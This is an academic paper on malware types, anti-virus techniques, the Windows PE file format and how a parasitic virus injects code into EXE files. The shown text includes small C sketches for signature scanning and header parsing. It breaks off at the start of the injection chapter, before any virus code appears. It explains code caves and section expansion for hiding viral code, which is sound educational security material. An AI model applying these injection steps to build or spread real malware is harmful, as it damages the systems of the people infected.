Code Injection and Computer Viruses

Faculty of Applied Sciences and Engineering
Department of Electronics and Informatics (ETRO)

Paper for the course of Operating Systems and Security by prof. Martin Timmerman.

Beerend Ceulemans
Janwillem Swalens

2012-2013



Abstract

In this paper we will investigate what computer viruses are and how they function, and show how a parasitic virus could be written in the C/C++ programming language, using only a minimum of inline assembly code.

We start by giving an overview of different types of malware (focusing on viruses), and discuss techniques used by anti-virus software. Next, we explain how code injection works by taking a look at the Microsoft Portable Executable (PE) file format (which is used to store executable files in Microsoft Windows), and we investigate how code can be injected into such a file. We then implement a virus using this technique in C/C++, explain how it works and provide a demonstration on a real system.

Contents

1 Malware overview
    1.1 Malware
    1.2 Viruses
        1.2.1 Companion virus
        1.2.2 Overwriting virus
        1.2.3 Parasitic virus
        1.2.4 Memory resident virus
        1.2.5 Boot sector virus
        1.2.6 Device driver virus
        1.2.7 Source code virus
        1.2.8 Document virus / Macro virus
    1.3 Worms
    1.4 Backdoors
    1.5 Trojan horses
    1.6 Adware & Spyware

2 Anti-virus techniques
    2.1 Approaches
    2.2 Techniques
        2.2.1 Signatures
        2.2.2 Heuristics
        2.2.3 File emulation
        2.2.4 Behavior blocking
        2.2.5 Inoculation
    2.3 Other concerns
        2.3.1 Performance
        2.3.2 False positives
    2.4 Disinfection

3 Portable Executable file format
    3.1 Address formats
        3.1.1 Relative Virtual Address (RVA)
        3.1.2 Virtual Address (VA)
        3.1.3 File offset
    3.2 PE header structures
        3.2.1 IMAGE_DOS_HEADER
        3.2.2 IMAGE_NT_HEADERS
        3.2.3 IMAGE_SECTION_HEADER
    3.3 Import Section

4 Code injection
    4.1 Location of injection
    4.2 EntryPoint
    4.3 Programming issues

5 Implementation
    5.1 First experiments
    5.2 Compiler settings
    5.3 Viral code structure
    5.4 First generation
        5.4.1 setLLAndGPA
        5.4.2 AStubStart
        5.4.3 CStubStart
        5.4.4 ThreadStart
    5.5 Next generations
    5.6 Disinfection
    5.7 Summary

6 Tests and Results
    6.1 Viral replication
    6.2 Infection capability
    6.3 Anti-virus

7 Conclusion

A Infection code

B Disinfection code

Introduction

In this paper, we will investigate what computer viruses are and how they function, and show how a parasitic virus could be written in the C/C++ programming language. Most parasitic viruses are written in assembly because of the low-level nature of their operation. We will show that it is also possible to write one in C/C++.

The first two chapters cover the theoretical part of our work. Because many people seem to think that every malware program is a virus, we give an overview of the different kinds of malware in chapter 1. We also show that within the class of viruses, even more subdivisions can be made. Chapter 2 delves into the techniques commonly used by anti-virus software to detect these threats.

In the next two chapters, we take a more practical look at code injection. In chapter 3, we examine the Microsoft Portable Executable (PE) file format, the format used to store executable files in Microsoft Windows. We need extensive knowledge of this format to be able to infect these types of files. Chapter 4 explains how the actual code injection, i.e. the injection of our parasitic virus into a host executable, will work, and what issues need to be resolved before we can do this.

Then, in chapter 5, we show our implementation of a virus. We go through our C++ code, and explain its different aspects. Finally, in chapter 6, we demonstrate an infection by the virus, and its propagation to other files, on an actual system. We also take a look at the detection rates of some virus scanners.


Chapter 1

Malware overview

1.1 Malware

[15] defines malware as a set of instructions that run on your computer and make your system do something that an attacker wants it to do. They also give a list of things that such ‘a set of instructions’ could do:

• Delete sensitive configuration files from your hard drive, rendering your computer completely inoperable.

• Infect your computer and use it as a jumping-off point to spread to all of your friends’ computers.

• Monitor your keystrokes and let an attacker see everything you type.

• Gather information about you, your computing habits, the Web sites you visit, the time you stay connected, and so on.

• Send streaming video of your computer screen to an attacker, who can essentially remotely look over your shoulder as you use your computer.

• Grab video from an attached camera or audio from your microphone and send it out to an attacker across the network, turning you into the unwitting star of your own broadcast TV or radio show.

• Execute an attacker’s commands on your system, just as if you had run the commands yourself.

• Steal files from your machine, especially sensitive ones containing personal, financial, or other sensitive information.

• Upload files onto your system, such as additional malicious code, stolen data, pirated software, or pornography.

• Bounce off your system as a jumping-off point to attack another machine, laundering the attacker’s true source location to throw off law enforcement.

• Frame you for a crime, making all evidence of a caper committed by an attacker appear to point to you and your computer.

• Conceal an attacker’s activities on your system, masking the attacker’s presence by hiding files, processes, and network usage.

The term malware is quite general and covers many different types of programs. In the following sections we will list some of these types, focusing on viruses.

Note that many malicious programs combine techniques or characteristics of different malware types, so there is not always a single correct category to put them in.

1.2 Viruses

Mark Ludwig describes a computer virus as a program that reproduces[9]. Once executed, it makes copies of itself and those copies will also have this capability.

He also notes that the term computer virus might be considered a misnomer, because it carries a negative connotation while a computer virus does not need to be inherently malicious. The benign or malicious nature of a virus comes from the payload, not from the viral reproduction mechanism. There are examples of benevolent viruses. For example, compressing viruses can compress large executables and actually save disk space[16].

1.2.1 Companion virus

A companion virus does not really infect a program, but it makes sure it gets executed before the actual program. In the MS-DOS days, this could be done by giving the virus the form of a .COM program with the same name as an existing .EXE program. If the user typed just the name of the program (without the file extension), the OS would first look for a .COM file, executing the virus instead of the intended program. This technique became obsolete when users started running their programs from the GUI instead of the console, but the same effect could still be achieved by simply changing the target of a shortcut on the Windows desktop or start menu. When the virus is executed, it may also launch the program that the user initially wanted to execute, hiding its presence from the user.

1.2.2 Overwriting virus

This type of virus will simply replace a target executable with itself by overwriting it (partially or completely). From the attacker’s point of view, this kind of virus is too easy to detect: it damages the host file, and the user will probably notice this.

1.2.3 Parasitic virus

To overcome the main problem of overwriting viruses (easy detection because the host gets damaged), parasitic viruses have been developed. A parasitic virus will infect a host by injecting its own code into the host. Simply injecting its code isn’t enough: it should also make sure the code gets executed. This is the type of virus that we will implement, so we will elaborate on this particular infection mechanism in Chapter 4.

1.2.4 Memory resident virus

In the case of a parasitic virus, when an infected program is executed, the virus runs, passes control to the host program and exits. The previous classes of viruses also need some kind of search routine to scan the file system for possible hosts to infect. This behaviour results in increased disk activity that could slow down the system [9, 17].

Memory resident viruses are viruses that remain in memory (RAM) constantly. Instead of actively searching for new hosts, they hook themselves to interrupts (system calls). This way, they can monitor what the user is doing and infect a program when it gets executed. The capturing of system calls also gives great potential for spying on data [17].

Note that this is a concept from the DOS era[11]. Nowadays, operating systems support multi-threading. A virus could set up a thread for its own code and pass control to the host.

1.2.5 Boot sector virus

When a computer is booted, it doesn’t know which OS has to be loaded or where this OS is located on the hard drive. It will first run the BIOS program, but this program also has no knowledge about the OS that is present. It will in turn look at the master boot record (MBR) at the start of the boot disk. (This boot disk is often the hard drive of the PC, but it can also be a CD/DVD or a USB device, depending on the BIOS configuration.) The MBR contains some machine code which is able to locate and launch an OS. This structure is not limited to the booting of operating systems. A boot sector can contain code that launches any program that is present on the disk.

A virus could infect the boot sector by overwriting the MBR with its own code. This kind of virus is called a boot sector virus. The virus will be executed each time the OS boots. (Note that it can operate before any anti-virus software is started.) When the virus is done, it should run the original MBR program so the OS can be loaded. Usually, these viruses become memory-resident after booting[17].

1.2.6 Device driver virus

Viruses can only function when executed, and this might require some user interaction. For the virus, it would be convenient if the OS always loaded it into memory. This can be done by infecting a device driver. Drivers are just programs, stored somewhere on the disk, that are loaded (in kernel mode) each time the OS boots[17].

1.2.7 Source code virus

Some viruses don’t infect executables but search the system for uncompiled programs. They can, for example, look for C files and add their own code by including a header and adding a call to the viral code in the main function of the program. This seems pretty silly, but a less conspicuous infection of the source code of a large project could be pretty effective. An advantage of this kind of virus is that it can be platform independent. Its disadvantage is the relatively small number of possible targets[15].

1.2.8 Document virus / Macro virus

Some applications (e.g. Microsoft Word and Excel) allow users to write macros. Taking Excel as an example: it is possible to write macros in Visual Basic, which is a full programming language, giving lots of possibilities. A virus could write its code in the Open Document() function of an Excel document; this code will be executed each time the user opens the document. However, under the default settings, Excel will warn that the document contains macros and ask the user whether they should be executed[17].

1.3 Worms

Worms, like viruses, are self-replicating. The big difference is that a virus usually requires some user interaction (execution of some program) while worms operate autonomously. Worms often exploit bugs (e.g. buffer overflows) to automatically transfer themselves over a network. Because of this ‘living’ nature, they can spread extremely fast.

1.4 Backdoors

Once an attacker has gained control over a system, he might want to ‘open a backdoor’ so he has less trouble when he wants to enter this system again at a later time[15]. He could achieve this by configuring something like a remote shell or even a remote desktop with a full GUI to always run after booting the computer. Note that these could be programs with legitimate uses. With such a program running on the target computer, the attacker can simply connect to it and he will have control over the target.

1.5 Trojan horses

Getting people to install your malware is not that easy anymore[17]. Users may still be naive enough to run executables you send them, but nowadays they will most likely get some notification from their e-mail client or anti-virus software that they should not trust your e-mail. Some types of malware try to make users want to install the software on their computer: a Trojan horse (or simply trojan) is a program that appears to be useful and benign, but secretly has some malicious functionality as well[15]. Trojan horses are named after the story in Greek mythology in which the Greeks invaded the city of Troy by hiding soldiers in a giant wooden horse, which they presented as a gift. The Trojans took the horse inside their city, and at night the Greek soldiers came out and opened the gates for their army.

1.6 Adware & Spyware

Spyware is a name for software that spies on the target system. It could gather (sensitive) information (e.g. stored passwords, e-mails, pictures, etc.) or capture keystrokes (this is called a keylogger). The gathered information can then be sent to the attacker over the internet. Adware is a kind of spyware that doesn’t really look for sensitive information, but for the interests of the user, e.g. by looking at his or her browsing behavior. This information could be used to generate personalized advertisements. Adware is not really malicious in nature, but it is often installed without the user’s knowledge or permission and can be considered a privacy violation[16].

Chapter 2

Anti-virus techniques

In this chapter, we will take a closer look at the techniques used by anti-virus software to detect malware. Although the exact details and ‘secret sauce’ used by popular commercial anti-virus software remain well-kept secrets, both from virus writers and from competitors, some general techniques are known.

2.1 Approaches

There are two main approaches used to detect malware[6].

• An activity monitor will continuously monitor the running system for suspicious activity. For example, a program opening another EXE for write access might be suspicious.

• A malware scanner scans the file system, RAM, boot sector etc. and checks their integrity, i.e. it will try to detect whether any files have been infected by a virus.

In most cases, anti-virus software will have to use both approaches. However, in some scenarios, only one approach is necessary, e.g. a mail server can scan the incoming mail for malware, but might not need an activity monitor.

2.2 Techniques

Anti-virus software uses a plethora of techniques[16]. This is necessary because some viruses might be impossible to detect using a single technique. It has even been proven that no algorithm exists that can detect all possible viruses with no false positives[4].


2.2.1 Signatures

The simplest and still most common technique is signature based detection. This technique consists of comparing the contents of a file to a given dictionary of ‘virus signatures’. These virus signatures are patterns which identify a virus.

The earliest form of signature based detection was a simple string scan. The signature is a sequence of bytes that appears in a virus, but is not likely to be found in a legitimate program. If a file contains this string, it is considered infected.

A simple improvement on this algorithm is to use wildcards in the pattern, so small variations of a virus can also be detected. Some algorithms also allow a small number of mismatches, or they use regular expressions for more complicated virus detection.
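As an illustration of the string scan with wildcards described above, the following is a minimal sketch in portable C. It is not taken from any particular scanner: the names find_signature and SIG_WILDCARD, and the choice to encode a signature as an array of int, are assumptions made for this example. The scan is deliberately naive; real products use far more efficient multi-pattern matching.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical signature encoding: each element is either a concrete byte
 * value (0..255) or SIG_WILDCARD, which matches any byte. */
#define SIG_WILDCARD (-1)

/* Returns the offset of the first occurrence of `sig` in `data`, or -1 if
 * the signature does not occur. Naive O(n*m) scan, chosen for clarity. */
long find_signature(const uint8_t *data, size_t data_len,
                    const int *sig, size_t sig_len)
{
    if (sig_len == 0 || sig_len > data_len)
        return -1;

    for (size_t start = 0; start + sig_len <= data_len; start++) {
        size_t i = 0;
        /* Advance while the pattern element is a wildcard or an exact match. */
        while (i < sig_len &&
               (sig[i] == SIG_WILDCARD || sig[i] == (int)data[start + i]))
            i++;
        if (i == sig_len)
            return (long)start;
    }
    return -1;
}
```

A caller would load a file into a buffer and run every applicable signature over it; a non-negative return value marks the file as suspect. The wildcard positions are what allow one signature to cover small variations of the same virus.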

This technique is widely used, and can be very effective. However, it can only be used for known viruses, of which samples have been obtained and for which a signature has been created. As new viruses are created every day, anti-virus software must include a way to update the virus signature dictionary. Thus, this technique can be very effective in preventing the spread of a known virus, but won’t protect the user from new viruses.

Virus writers have also tried to circumvent it by using polymorphic and metamorphic code. These sorts of viruses change their code when spreading, while keeping the original algorithm intact.

2.2.2 Heuristics

Another, more sophisticated technique is based on heuristics, which can be used to identify both known and new malware.

The anti-virus will check for some common features of viruses:

• In most EXE files, the tail of the last section (the last few kilobytes) will contain a lot of zeros. Viruses, including ours, often overwrite this with their code.

• Changes to the section headers are very suspicious. Atypical values, such as the “data” section being marked executable, or extra sections with unknown names, are telltale signs of a virus.

• Other inconsistencies in the header, such as an incorrect section or file size, are another red flag.

• Suspicious jumps in the code are another sign of a virus. Viruses often change the entry point of an EXE to point to the start of the virus, which afterwards jumps back to the original code. In some cases, this is detectable.

• Suspicious imports: a virus might patch the imports in an EXE file to include extra libraries, which might also be detectable.

The anti-virus maker will train a neural network on a set of known positives and known negatives. Given these features as input, the network can then estimate whether a file is infected or not.
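To make the first feature in the list above concrete, here is a small C sketch that measures how much of a section's tail consists of zero bytes. The function name tail_zero_fraction and the idea of passing the tail length as a parameter are assumptions for this example; how many bytes count as "the tail" and what fraction counts as suspicious are tuning choices that the text does not specify.

```c
#include <stddef.h>
#include <stdint.h>

/* Fraction (0.0 .. 1.0) of zero bytes among the last `tail_len` bytes of a
 * buffer holding a section's raw data. If the buffer is shorter than
 * `tail_len`, the whole buffer is examined. */
double tail_zero_fraction(const uint8_t *section, size_t section_len,
                          size_t tail_len)
{
    if (section_len == 0 || tail_len == 0)
        return 0.0;
    if (tail_len > section_len)
        tail_len = section_len;

    size_t zeros = 0;
    for (size_t i = section_len - tail_len; i < section_len; i++) {
        if (section[i] == 0)
            zeros++;
    }
    return (double)zeros / (double)tail_len;
}
```

On its own, a low value proves nothing, since legitimate programs may also fill their last section completely. It would be one numeric input among several for the kind of classifier described above.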

2.2.3 File emulation

File emulation or sandboxing is a more recent technique, aimed at dealing with the fact that users continually run new programs from untrusted sources.

An unverified program is first run in a virtual system, in which it has access to the same information as in the real system. It can make modifications to files and the registry, but these are made on a copy of the actual information. The anti-virus software monitors the program, and detects suspicious behavior. If the program does nothing suspicious, the modifications made by the program can be saved permanently; otherwise they are thrown away.

This technique might be used in combination with heuristics, i.e. a program which is suspected to be infected according to the heuristics can be run in the sandbox to confirm or reject this hypothesis.

This technique has some disadvantages. First of all, the virtual subsystem might have reduced functionality compared to the real system, which can cause compatibility problems for the program under test. Secondly, sandboxing might not detect all viruses, which will allow them to run in the real system, where they might disable the sandbox. Lastly, the sandbox might have ‘holes’, which allow the program to ‘escape’ from it, i.e. execute code on the real machine instead of the virtual machine.

2.2.4 Behavior blocking

Behavior blocking is a system which attempts to block virus infections by disallowing some behaviors. For example, the opening of one executable by another for writing could be blocked. However, instead of outright blocking this behavior, which might have legitimate uses, the anti-virus will display a message to the user asking for his permission.

Unfortunately, such messages quickly become unwieldy for the user. There are too many of them, and the user often doesn’t understand them, which will lead him to just accept them all.

An even larger drawback is that implementing this technique is very difficult without good support from the operating system and even the hardware.

However, when combined with heuristics, this technique does offer some promising uses. The heuristics can be used to reduce the number of false positives, for example for viruses embedded in e-mails (the self-mailing behavior can be recognized and blocked).

2.2.5 Inoculation

Lastly, a now long outdated technique is inoculation, building on an idea similar to vaccination. A virus that infects a file will ‘mark’ it to prevent double infection. It might change the seconds in the timestamp to 58, or it might write a short string to a specific location in the EXE header. The anti-virus software will add these markers to non-infected files, so the virus will think they are already infected.

This technique was quite popular at the time viruses first appeared. However, it has large drawbacks, e.g. when viruses write contradictory markers (one changes the seconds in the timestamp to 58, the other to 59) it is impossible to inoculate against both. It is also impossible to inoculate against unknown viruses. Lastly, inoculation can make the detection of viruses harder, because the marker might be used by the detection algorithm (i.e. we have to differentiate between an infected file and an inoculated file).

2.3 Other concerns

2.3.1 Performance

In the early days of anti-virus software, the number of signatures used by an anti-virus was in the hundreds. Nowadays, there are over 60,000 known viruses and other malware. If a virus scanner compared every file on the user’s system against each of those signatures, it would be unacceptably slow[6].

Anti-virus software uses some techniques to alleviate this problem. First of all, signatures are put into categories designating which sort of file they infect (e.g. boot sector, COM files, EXE files). This way, an EXE file only has to be checked against viruses that infect EXE files.
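The categorisation step can be sketched as follows. This is a simplified illustration in C: the types file_category and signature and the function select_signatures are hypothetical names for this example, and a real scanner would more likely keep one pre-built table per category than filter a flat list on every scan.

```c
#include <stddef.h>

/* Hypothetical categories, following the examples named in the text. */
enum file_category { CAT_BOOT_SECTOR, CAT_COM, CAT_EXE };

struct signature {
    const char *name;            /* illustrative label only */
    enum file_category category; /* kind of file this virus infects */
};

/* Copies pointers to the signatures that apply to `wanted` into `out`
 * (capacity `out_cap`) and returns how many were selected. */
size_t select_signatures(const struct signature *all, size_t count,
                         enum file_category wanted,
                         const struct signature **out, size_t out_cap)
{
    size_t n = 0;
    for (size_t i = 0; i < count && n < out_cap; i++) {
        if (all[i].category == wanted)
            out[n++] = &all[i];
    }
    return n;
}
```

Only the selected signatures then need to be matched against the file, so the cost of a scan grows with the size of one category instead of the size of the whole dictionary.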

Secondly, certain rules can be applied to avoid looking through the whole file. For example, Word DOC files contain macros in a very specific location, so only this part of the file has to be checked. Similarly, COM files are mostly infected at the end of the file.

Lastly, instead of using specific signatures to identify a single virus variant, it might be more efficient to generate a more general signature that can identify a number of viruses. These signatures can contain wildcards, regular expressions, etc. to identify many variants of the same type of virus. There exist “virus generators” on the internet, against which these types of signatures can be especially efficient.

2.3.2 False positives

A “false positive” happens when anti-virus software identifies a non-malicious file as a virus. This can have serious consequences when the anti-virus tries to ‘disinfect’ the file. For instance, if the anti-virus software is configured to immediately delete or quarantine an infected file, a false positive in an essential file can render the operating system unusable.

There have been several incidents in which popular anti-virus software left the user’s system unusable. For example, in May 2007, a faulty virus signature issued by Symantec mistook “netapi32.dll” and “lsasrv.dll”, two essential Windows system files, for a Trojan horse[5]. It quarantined them, rendering the system unusable.

False positives can have grave consequences not only for the user, but also for the anti-virus maker. After a faulty signature update issued by McAfee in April 2010 rendered many systems worldwide unusable, the company offered financial compensation to its customers[19]. Similarly, in October 2011 the Microsoft Security Essentials suite flagged the Google Chrome web browser (rival to Microsoft’s own Internet Explorer) as a virus and blocked or removed it from users’ computers, which led to a great deal of reputation damage for Microsoft[8].

2.4 Disinfection

After a virus has been detected, it is of course necessary to remove it from the system.

The easiest removal method is to quarantine or remove the infected file. In the case of removal, the infected file is simply deleted from the system. A quarantined file is first moved to a ‘quarantine’, where the user can inspect it but where it cannot cause any further harm to the system, after which the user can decide whether or not to remove it.

Removing is, in fact, the most reliable method of disinfection. Afterwards, the user is supposed to recover the removed file from a back-up, or re-install it (this might mean re-installing the complete operating system). This guarantees that the virus is removed from the system, and that the infected file is replaced with a clean version. However, it requires effort on the part of the user, and some forethought (making back-ups).

Another method, which requires less effort and technical expertise from the user, is to disinfect the file, i.e. try to remove the virus from the file.

Originally, anti-virus software was only able to disinfect known viruses, for which the anti-virus makers wrote a specific removal tool. However, since the rise of virus generators, it has been necessary to write generic disinfection tools. It is possible to write such tools, but it remains a difficult problem: this method works but cannot be considered truly reliable.

One way to disinfect files, also used in the removal tool we wrote for our virus, is to find the virus code among the original code of the host program. Somewhere in this code, we find the entry point of the original host (where the virus ‘jumps back’ to the host program). The removal tool removes the virus code, and changes the entry point in the PE header to point to the original entry point instead of the entry point of the virus.

Unfortunately, it is in many cases still impossible to use such generic methods, and in some cases it is even impossible to clean a program (e.g. when the virus has overwritten a part of the original program). It is estimated that around 30% of all viruses cannot be removed, although many anti-virus programs do not even come close to this figure[16].

Chapter 3

Portable Executable file format

The virus that we will write in this paper will inject itself into EXE files on Windows. Before we can do this, it is important to know how the code and data in these files are structured.

EXE files on Windows use the Portable Executable (PE) file format. This format, also used for DLLs, object code and others, is a data structure that contains all necessary information for Windows to load the executable code contained in it.

The information presented in this chapter comes from the official specification for the Microsoft Portable Executable (PE) and Common Object File Format (COFF)[10] and some articles from the MSDN website[12, 13, 14]. [12] (1994) is older than the two others (2002), but the newer ones don’t show any example C code, while the 1994 article does.

There is much to say about all these things, but in this chapter we select only the parts relevant to code injection.

3.1 Address formats

When working with PE files and assembly code, it is important to know the different kinds of addresses that are being used.

3.1.1 Relative Virtual Address (RVA)

The RVA is the address of an item after it is loaded into memory, with the base address of the image subtracted. (Thus, relative to the ImageBase.)

3.1.2 Virtual Address (VA)

This is the same as the RVA, except that the base address of the image file is not subtracted. The address is called “virtual” because Windows creates a distinct virtual address space for each process, independent of physical memory. Because the OS does not guarantee that the image file will be loaded at its preferred location, the VA is less predictable than the RVA.
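The relation between the two address formats is a single addition or subtraction. The following C sketch spells it out for a 32-bit image; the function names rva_to_va and va_to_rva are hypothetical, and load_base stands for the address at which the image was actually loaded, which equals the preferred base only if the loader honoured it.

```c
#include <stdint.h>

/* VA = actual load base + RVA (32-bit image assumed). */
uint32_t rva_to_va(uint32_t load_base, uint32_t rva)
{
    return load_base + rva;
}

/* RVA = VA - actual load base. */
uint32_t va_to_rva(uint32_t load_base, uint32_t va)
{
    return va - load_base;
}
```

For example, with a load base of 0x00400000, an item at RVA 0x1000 has VA 0x00401000. If the same image is loaded at 0x10000000 instead, the RVA is unchanged while the VA becomes 0x10001000, which is exactly why the VA is the less predictable of the two.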

3.1.3 File offset

The file offset is simply the position in the file as written on disk. It is not really an address per se, but it has similar properties because it also points to some location. As we will see in the next sections, a PE file contains sections which reside at a certain location in the file but are also given an RVA for when they are loaded into memory. Sometimes, a conversion between a file offset (in a section) and an RVA is needed.
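A minimal sketch of this conversion in C is given below. It assumes that the section table has already been read into an array of a simplified, hypothetical structure section_info; its three fields correspond to the VirtualAddress, SizeOfRawData and PointerToRawData fields of the real IMAGE_SECTION_HEADER. The function names are likewise made up for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified, hypothetical view of a section header: only the fields needed
 * for address conversion. */
struct section_info {
    uint32_t virtual_address;     /* RVA of the section when loaded */
    uint32_t size_of_raw_data;    /* bytes the section occupies in the file */
    uint32_t pointer_to_raw_data; /* file offset of the section's data */
};

/* Converts an RVA to a file offset. Returns 1 and stores the result in
 * *offset on success, or 0 if no section's file data covers the RVA. */
int rva_to_file_offset(const struct section_info *sections, size_t count,
                       uint32_t rva, uint32_t *offset)
{
    for (size_t i = 0; i < count; i++) {
        const struct section_info *s = &sections[i];
        if (rva >= s->virtual_address &&
            rva - s->virtual_address < s->size_of_raw_data) {
            *offset = rva - s->virtual_address + s->pointer_to_raw_data;
            return 1;
        }
    }
    return 0;
}

/* The inverse conversion: file offset to RVA, with the same return
 * convention. */
int file_offset_to_rva(const struct section_info *sections, size_t count,
                       uint32_t offset, uint32_t *rva)
{
    for (size_t i = 0; i < count; i++) {
        const struct section_info *s = &sections[i];
        if (offset >= s->pointer_to_raw_data &&
            offset - s->pointer_to_raw_data < s->size_of_raw_data) {
            *rva = offset - s->pointer_to_raw_data + s->virtual_address;
            return 1;
        }
    }
    return 0;
}
```

Both functions find the section that contains the input and then shift by the difference between that section's position in memory and its position in the file. An RVA that falls in the part of a section that exists only in memory has no file offset, which is why the functions report failure instead of guessing.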

3.2 PE header structures

Figure 3.1: Typical Portable EXE File Layout[10]

In Figure 3.1, the general layout of a PE file is shown. The file consists of headers and sections. Most sections contain either machine code or data. (There are some sections which contain some special information, but we won’t go into detail about those.) The headers provide information on how the sections (and thus, the program) should be loaded into memory. In Windows.h, functions and data structures are provided to easily work with these files. This file format is used for EXE files but also for DLLs and others. This chapter only considers executables, but the others could be manipulated in a similar way.

3.2.1 IMAGE_DOS_HEADER

The first header is the MS-DOS compatible header, called IMAGE_DOS_HEADER. When the file is executed in MS-DOS, the OS will be able to read this header and execute the MS-DOS stub program. By default this program simply prints a message saying “This program cannot be run in DOS mode”. A PE-aware operating system skips the stub and only looks at the value located at file offset 0x3C (the e_lfanew field), which contains the file offset of the PE header, IMAGE_NT_HEADERS. It will then turn to this PE header for instructions on how to load the actual program.

3.2.2 IMAGE_NT_HEADERS

The IMAGE_NT_HEADERS consist of the IMAGE_NT_SIGNATURE, the IMAGE_FILE_HEADER and the IMAGE_OPTIONAL_HEADER. The signature contains the characters “PE\0\0” and can be used to check if the file is a valid PE file. The file header contains some basic information about the file (e.g. NumberOfSections) but most importantly it contains a field (SizeOfOptionalHeader) saying how big the optional header, which directly follows the file header, will be. The optional header contains many fields but from the perspective of code injection the most important fields are the following:

• AddressOfEntryPoint: the RVA of the first byte of code that will be executed. In Chapter 4, we will modify this address to execute our own code.

• ImageBase: the preferred load address of the file in memory. It will be used to convert between different address modes.
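The path from the DOS header to the PE signature can be sketched as a small read-only check on a file that has been loaded into a buffer. This is a minimal sketch, not the code from the paper: `find_pe_header` and `read_u32_le` are hypothetical helper names, and the “MZ” check at offset 0 is the standard DOS magic value, which the text above does not mention.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read a little-endian 32-bit value from a byte buffer. */
static uint32_t read_u32_le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 and stores the file offset of the PE signature in *pe_offset
 * if the buffer starts with a DOS header that points to "PE\0\0". */
int find_pe_header(const uint8_t *buf, size_t len, uint32_t *pe_offset) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return 0;                               /* no DOS header */
    uint32_t e_lfanew = read_u32_le(buf + 0x3C); /* pointer to the PE header */
    if (e_lfanew > len || len - e_lfanew < 4)
        return 0;                               /* pointer outside the file */
    if (memcmp(buf + e_lfanew, "PE\0\0", 4) != 0)
        return 0;                               /* signature mismatch */
    *pe_offset = e_lfanew;
    return 1;
}
```

The file header starts directly after the four signature bytes, followed by the optional header.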

3.2.3 IMAGE_SECTION_HEADER

Immediately following the IMAGE_OPTIONAL_HEADER are the IMAGE_SECTION_HEADERs. They have a fixed size and their number is given in the NumberOfSections field of IMAGE_NT_HEADERS.FileHeader. They contain the following important fields:

• Misc.VirtualSize: the actual size that is being used by the section. Sections might be zero-padded at the end to ensure a certain alignment.

• VirtualAddress: in executables, this field contains the RVA where the section begins in memory. It will be used to convert between different address modes.

• SizeOfRawData: the total size of the section (used + unused).

• PointerToRawData: the file offset to the raw data of the section.

• Characteristics: a bitmap of flags that indicate some attributes of the section, e.g. if the section contains code, if it is writable, etc.
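The Characteristics bitmap can be decoded with simple bit tests. The sketch below uses the flag values defined in the PE/COFF specification (named IMAGE_SCN_* in winnt.h); the shortened macro names and the helper functions are hypothetical. A section that is both writable and executable is unusual in compiler output, which is why analysis tools often flag it.

```c
#include <stdint.h>

/* Section flag values from the PE/COFF specification. */
#define SCN_CNT_CODE    0x00000020u /* section contains executable code */
#define SCN_MEM_EXECUTE 0x20000000u /* section can be executed          */
#define SCN_MEM_READ    0x40000000u /* section can be read              */
#define SCN_MEM_WRITE   0x80000000u /* section can be written to        */

int section_is_executable(uint32_t characteristics) {
    return (characteristics & SCN_MEM_EXECUTE) != 0;
}

int section_is_writable(uint32_t characteristics) {
    return (characteristics & SCN_MEM_WRITE) != 0;
}

/* True if the section is writable and executable at the same time. */
int section_is_write_execute(uint32_t characteristics) {
    return section_is_executable(characteristics) &&
           section_is_writable(characteristics);
}
```

A typical code section has the value 0x60000020 (code, executable, readable), for which `section_is_write_execute` returns 0.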

3.3 Import Section

A PE file will almost always import some functionality from some DLLs. In Windows, nearly all native programs have some dependency on kernel32.dll and many use functions from user32.dll. These dependencies are described in the import section.

The import section is simply an array of IMAGE_IMPORT_DESCRIPTOR structures. For each imported executable (like kernel32.dll or user32.dll) there will be such a structure in the import section. The most important fields of an IMAGE_IMPORT_DESCRIPTOR are the name field, which is an RVA that points to an ASCII string that contains the name of the imported executable, and two parallel arrays, initially identical, called the Import Address Table (IAT) and Import Name Table (INT). Both these arrays contain elements of the IMAGE_THUNK_DATA type, one for each imported variable or function. The reason why there are two arrays is that before any code is executed, the IAT will be overwritten by the Windows loader, and the INT is there to still have the original information as well. Basically, the loader will load a DLL and look for the requested functions. For each of those functions it will determine its address and write it in the corresponding slot in the IAT.

Chapter 4

Code injection

Now that we know how a Portable Executable is structured, we will examine how a (malicious) program could inject code of its own into a target host application. This chapter will explain how we can do this, and try to answer some issues surrounding code injection; in the next chapter we will show our actual implementation in C.

There are different tools that are able to show the contents of a PE in a structured way. Such tools are very useful when you are working on code injection or when you are reverse engineering a program. Examples of free tools are PEview and CFF Explorer. Figures 4.1a and 4.1b show a screenshot of PEview and CFF Explorer respectively, both looking at the AddressOfEntryPoint in the optional header. CFF Explorer has many more features than PEview, but we prefer the latter because it displays the bytes in the sections more clearly and allows easy switching between different address/offset modes.

It is quite obvious that the injected code will need to be compiled machine code. There remain three main issues to successfully inject code into a PE:

• Where to put the code?

• How to make sure the code is executed?

• How to make sure the injected code works inside the host?

These issues are addressed in the next sections.

4.1 Location of injection

It doesn’t really matter where the injected code will end up. However, if the host program should still be able to function normally after injection, none of its original code should be overwritten. Figure 4.2a shows a part of a code section in a PE. The end of a section is often padded with zeros that are not being used. This is an ideal location to put code of our own. After injecting some code, the section looks like Figure 4.2b. Such a region containing only zeros is called a code cave. It might also be possible to find code caves somewhere in the middle of a section, but they are less likely to be large enough to hold our code.

Figure 4.1: Screenshots of (a) PEview and (b) CFF Explorer

Even at the end of a section there is no guarantee that there exists a code cave that is large enough to contain our code. This problem could be solved simply by expanding a section to make it large enough, or by adding an extra section just for our code[3]. From an implementation perspective both solutions introduce some difficulties. In the second solution, a new section header will need to be created. To do this, all information after the last original header will need to be moved to make room for the new header. Also, all pointers to raw data in the original headers will need to be updated. This is not that difficult, but it involves some extra work. The same problem arises when increasing the size of a section, unless the expanded section is the last one. In this case, only the size fields in the corresponding header need to be updated.

Figure 4.2: Example of a code cave: (a) empty code cave, (b) code cave with injected code

In our own implementation, we chose to expand the last section. When doing this, we have to make sure that the new size of the section is a multiple of the FileAlignment that is defined in the optional header. If we neglect to do this, the Windows loader will say that the injected host is not a valid Win32 application and it will not run it.
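Rounding a size up to a multiple of an alignment value is plain integer arithmetic. A minimal sketch in C, where `align_up` is a hypothetical helper name and 0x200 in the usage note is only an assumed example of a FileAlignment value:

```c
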